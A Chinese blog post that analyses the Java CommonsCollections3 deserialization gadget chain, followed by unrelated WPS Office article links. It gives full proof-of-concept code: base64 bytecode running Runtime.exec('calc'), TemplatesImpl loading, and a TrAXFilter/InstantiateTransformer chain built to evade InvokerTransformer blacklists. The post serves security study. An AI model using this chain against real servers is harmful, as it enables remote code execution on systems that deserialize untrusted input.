Java反序列化漏洞——CommonsCollections3链分析

最新推荐文章于 2024-11-21 09:59:30 发布
最新推荐文章于 2024-11-21 09:59:30 发布
阅读量1k 收藏 1
点赞数
分类专栏: # java漏洞 文章标签: java 反序列化 渗透测试 安全 CC3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/129091574
版权
文章详细解释了如何通过Java的Runtime.getRuntime.exec()执行系统命令,以及如何利用TemplatesImpl动态加载字节码来执行恶意代码。它描述了CC1链的构造过程,然后转向介绍如何通过TrAXFilter和InstantiateTransformer构建新的CC3利用链,以绕过一些安全过滤机制。文章还提到了ysoserial工具和针对反序列化攻击的安全防御措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、原理

CC1链中我们是通过调用Runtime.getRuntime.exec()来执行系统命令,而另一个方向我们可以通过TemplatesImpl加载字节码的类,通过调⽤其newTransformer() 方法,即可执⾏这段字节码的类构造器,我们在类构造器中加入恶意代码,即可执行任意命令。

二、分析构造

1.CC1链

  • 在CC1链中,我们的payload如下

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.getRuntime()),
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = TransformedMap.decorate(innerMap, null, chainedTransformer);
outerMap.put("test", "xxxx");

2.TemplatesImpl动态加载

  • 我们用TemplatesImpl()动态加载字节码如下:

byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][] {code});
setFieldValue(obj, "_name", "test");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

  • 其中setFieldValue()的代码如下:

public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj, value);
}

  • 其中base64中的内容为如下编译后base64出来的,参考

package com.TemplastesImplTest;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class codeTest extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
    public codeTest() throws Exception{
        Runtime.getRuntime().exec("calc");
    }
}

3.transformers设置

  • 那么两个合并到一起就可以执行任意字节码,只需要将第⼀个demo中InvokerTransformer执⾏的“⽅法”改成TemplatesImpl::newTransformer()

Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(obj),
    new InvokerTransformer("newTransformer", null, null)
};

4.则改造好的payload如下:

public class CC3 {
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "test");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        Transformer[] newTransformers = new Transformer[]{
                new ConstantTransformer(obj),
                new InvokerTransformer("newTransformer", null, null)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(newTransformers);
        HashMap hashMap = new HashMap();
        Map decorate = TransformedMap.decorate(hashMap, null, chainedTransformer);
        decorate.put("test","test");
    }
}

三、ysoserial的CC3链分析

1.背景

  • 2015年初,@frohoff和@gebl发布了Talk《Marshalling Pickles: how deserializing objects will ruin your day》,以及Java反序列化利⽤⼯具ysoserial,随后引爆了安全界。开发者们⾃然会去找寻⼀种安全的过滤⽅法,于是类似SerialKiller这样的⼯具随之诞⽣。

  • SerialKiller是⼀个Java反序列化过滤器,可以通过⿊名单与⽩名单的⽅式来限制反序列化时允许通过的类。在其发布的第⼀个版本代码中,我们可以看到其给出了最初的⿊名单:

  • 这个⿊名单中InvokerTransformer赫然在列,也就切断了CommonsCollections1的利⽤链。有攻就有防,ysoserial随后增加了不少新的Gadgets,其中就包括CommonsCollections3。

2.TrAXFilter

  • CommonsCollections3的⽬的很明显,就是为了绕过⼀些规则对InvokerTransformer的限制。CommonsCollections3并没有使⽤到InvokerTransformer来调⽤任意⽅法,⽽是⽤到了另⼀个类,com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter

  • 这个类的构造⽅法中调⽤了(TransformerImpl) templates.newTransformer() ,免去了我们使⽤InvokerTransformer⼿⼯调⽤newTransformer() ⽅法这⼀步

3.InstantiateTransformer

  • 当然,缺少了InvokerTransformer,TrAXFilter的构造⽅法也是⽆法调⽤的。这⾥会⽤到⼀个新的Transformer,就是org.apache.commons.collections.functors.InstantiateTransformer

  • InstantiateTransformer也是⼀个实现了Transformer接⼝的类,他的作⽤就是调⽤构造⽅法。所以,我们实现的⽬标就是,利⽤InstantiateTransformer 来调⽤到TrAXFilter 的构造⽅法,再利⽤其构造⽅法⾥的templates.newTransformer() 调⽤到TemplatesImpl ⾥的字节码

4.CommonsCollections3

  • 所以新构造的Transformer调用链如下:

Transformer[] newTransformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{obj}
                )
        };

  • 则重新改造的payload如下:

public class CC3 {
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "test");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        Transformer[] newTransformersnewfail = new Transformer[]{new ConstantTransformer(1)};
        Transformer[] newTransformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{obj}
                )
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(newTransformersnewfail);
        HashMap hashMap = new HashMap();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);

        TiedMapEntry tme = new TiedMapEntry(decorate, "keykey");
        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");
        decorate.remove("keykey");

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(chainedTransformer, newTransformers);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        objectInputStream.readObject();
    }
}

wps 字体对系统无效_wps 字体显示怎么办 - 卡饭网
weixin_36281932的博客
12-23 8116
word文本字体显示全怎么解决?字体全部显示出来方法介绍word文本字体显示全怎么解决?字体全部显示出来方法介绍 使用办公软件officewps时,经常会到word文本字体只显示上半身或只显示下半身,而上半部分或下半部分见了!这是为什么呢?又怎么办呢?其实造成这种情况是因为word文本设置了固定的行距,之后,如果增大字体,就会因为行距足而无法把字体全部显示出来了.所以,只要把固定行距解除...
WPS无法输入汉字?教你一步步排查解决!
最新发布
mmoo_python的博客
04-21 875
打开WPS→文件→选项→自定义功能区。在键盘快捷方式中,为“切换输入法”分配独立快捷键(如Alt+Z)。WPS无法输入汉字的问题,通常可通过配置输入法关联、修复系统服务、更新软件版本等方式解决。建议用户优先尝试文中提供的核心方法,若问题持续,可结合系统日志(通过事件查看器)进一步分析。技术问题的排查需要耐心与系统性,逐步缩小故障范围,最终定位根源。掌握这些技巧后,面对类似办公软件问题,用户将能更高效地自主处理。
wps程序能打开显示内容
qq_31146399的博客
10-22 3897
问题:wps打开word,桌面显示内容 方法:1 打开word软件,电脑任务栏有这个图标,桌面显示内容 打开任务管理器,点击点击查看word进程,点击进程会看到如下如所示,点击最大化就ok了。 方法二:重新安装wps,哈哈 ...
Ubuntu Linux 13.10 中WPS输入法无法跟随显示问题
流离马--枫林漫步
04-22 1113
我的是Ubuntu Linux 13.10,输入法除了WPS以外其他软件输入都有文字跟随显示,唯独在WPS中没有文字跟随框,无法选择输入文字,换其它的输入法问题依旧。查阅资料后以如下方法解决: 安装qt4-qtconfig和ibus-qt4,安装ibus-qt4之后运行qt4-qtconfig在“界面”选项卡中选择“设置XIM输入风格”为“光标跟随风格(Over The Spot),保存设
wps隐藏文字显示文字
weixin_41272269的博客
02-16 2331
wps的doc可以实现这个功能,Excel目前可以实现。office同理。 文章目录1.隐藏文字步骤:效果:2.显示文字:步骤:效果:3. [拓展:隐藏表格中的文字]:步骤:效果如下: 1.隐藏文字 步骤: 1.选中需要隐藏的文字, 2.右键选择字体, 3.在隐藏上面打上勾,如下图 效果: 2.显示文字: 步骤: 1.选择菜单, 2.选项, 3.在隐藏文本上打上勾,如下图。 效果: 3...
字体安装成功但是wps显示
热门推荐
xitongzhijianet的博客
02-24 2万+
在编辑wps文档时,一些用户会给wps字体库添加需要的字体,但是发现字体安装成功,wps却没有显示,这是怎么回事?
WPS office综合诊断修复工具
08-14
WPS Office是一款流行的办公软件套装,它包含了文字处理、电子表格、演示文稿等多种功能,类似于微软的Office。然而,用户在使用过程中可能会遇到各种问题,如程序崩溃、默认格式设置异常或注册表错误等。为了解决...
WPSoffice在线预览编辑
07-21
7. **功能丰富**:除了基本的文字处理、表格制作和演示制作,WPS Office 还提供了一系列进阶功能,如模板库、图表制作、公式编辑等,帮助用户提升文档的专业性和美观度。 通过压缩包文件“webofficedemo”,我们...
WPS API帮助文档
12-10
WPS API,全称为WPS Application Programming Interface,是由金山软件提供的接口,允许开发者在Windows操作系统环境下对WPS Office产品进行深度定制和二次开发。通过这些API,开发者可以实现与WPS Word文档的交互,...
WPS Office轻松办公(文字篇)
06-17
本视频教程是指导初学者学习WPS的入门教程,视频中介绍了WPS Office 2019文字的基本概念和基础操作,如何创建与保存文档输入文档内容,文档编辑修改,编辑界面及相关设置;设置文本格式,设置段落格式,应用特殊...
WPS Office之Word文字入门基础
06-09
在本课程“WPS Office之Word文字入门基础”中,我们将深入探讨如何高效地使用WPS文字进行文档处理,帮助初学者从零开始逐步成为职场文档编辑专家。WPS Office是一款由中国金山软件公司开发的办公软件套件,它包含与...
WPS表格文字显示全?一键解决!
mmoo_python的博客
11-21 5011
通过调整WPS表格中单元格的格式设置,我们可以轻松解决文字显示全的问题。具体方法是通过设置单元格的对齐方式为“常规”,并勾选“自动换行”选项。这样,无论单元格内的文字有多长,都能够全部显示出来,无需再手动双击单元格。希望这个解决方案能够帮助你更高效地使用WPS表格进行数据编辑和查看。此外,WPS作为一款功能强大的办公软件,还提供了许多其他实用的功能和设置选项。如果你在使用过程中遇到了其他问题或需要更多帮助,可以随时查阅WPS的官方文档或在线支持资源。
WPS光标消失,无法打字
效率平和
12-03 1万+
现象: WPS 打字时,光标突然消失,然后无法打字,过几秒钟又回来了。 用录屏工具观察任务管理器中的额进程,发现一个特别程序wpsrenderer.exe出现时,光标会消失。 网上查询了下,这个是WPS的云登录和广告推送程序,把它删除就好了。 我电脑上的路径: E:\Program Files\WPS Office\10.1.0.7245\10.1.0.7346\office6 我是通过ever...
为什么文本框里的字只显示一半_Word文档文字显示全的解决方法有哪些
weixin_35414484的博客
02-05 2万+
在Word 文档中,如果把段落中的文字字号设置大一点的字体,可能会出现文字显示全的情况;表格中也可能出现这种情况,文字显示一半或都显示出来,是什么原因?以下是学习啦小编为您带来的关于Word文档文字显示全,希望对您有所帮助。Word文档文字显示全对于段落中的文字而言,一般是由于设置的行距太小所致;对于表格而言,可能行指定了高度,由于指定的高度小于字体的高度,所以大于行高度的部分被遮盖。...
WPS文本框跨页显示方法
xgmiao的专栏
06-29 1万+
鼠标放在第一个文本框边界,然后右键,选择“创建文本框链接”,则鼠标指针变为罐状指针,用罐状指针单击第二个文本框边界,则在两个文本框间建立了链接(注意的是第二个文本框要是空的)。如果还想链接第三个文本框,请单击第二个文本框,采用同样方法创建链接即可。
逆向Mac版WPS(解除版本过期限制)
逆钟夕的忘忧阁
07-04 1万+
之前安装了Mac版office软件,感觉体量较大,后来发现网上有WPS的2016测试版本,就拿来用了,也比较稳定速度快,整体包也大,平均每个210M,今天2018.07.02,我WPS突然打开了随便打开就弹出 the alpha version expired! please update latest version .然后一个确定就退出了,三个都这样.image.png我也想升级最新版,你...
wps文档服务器授权怎么解,如何解决WPS提示授权已到期的问题
weixin_36378669的博客
08-12 1万+
如何解决WPS提示授权已到期的问题发布时间:2020-07-23 10:09:52来源:亿速云阅读:873作者:Leah本篇文章给大家分享的是有关如何解决WPS提示授权已到期的问题,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话多说,跟着小编一起来看看吧。WPS提示授权已到期的解决方法:首先点开设置并点击“配置和修理工具”;然后点击“高级(A)”并进入到“产品管理...
ImportError: cannot import name 'Protocol' from 'typing'
05-30
这个错误通常是由于使用了过期的 Python 版本引起的,'Protocol' 是 Python 3.8 中引入的新类型,如果你的 Python 版本低于 3.8,那么就会出现该错误。如果你的 Python 版本低于 3.8,那么可能是你的代码中存在其他问题。 为了解决这个问题,可以尝试以下几个方法: 1. 更新你的 Python 版本至 3.8 或更高版本。 2. 检查你的代码中是否存在拼写错误或其他语法错误。 3. 确认你的代码中是否有导入 'typing' 模块的其他部分,在这些部分中导入 'Protocol' 可能会导致此错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值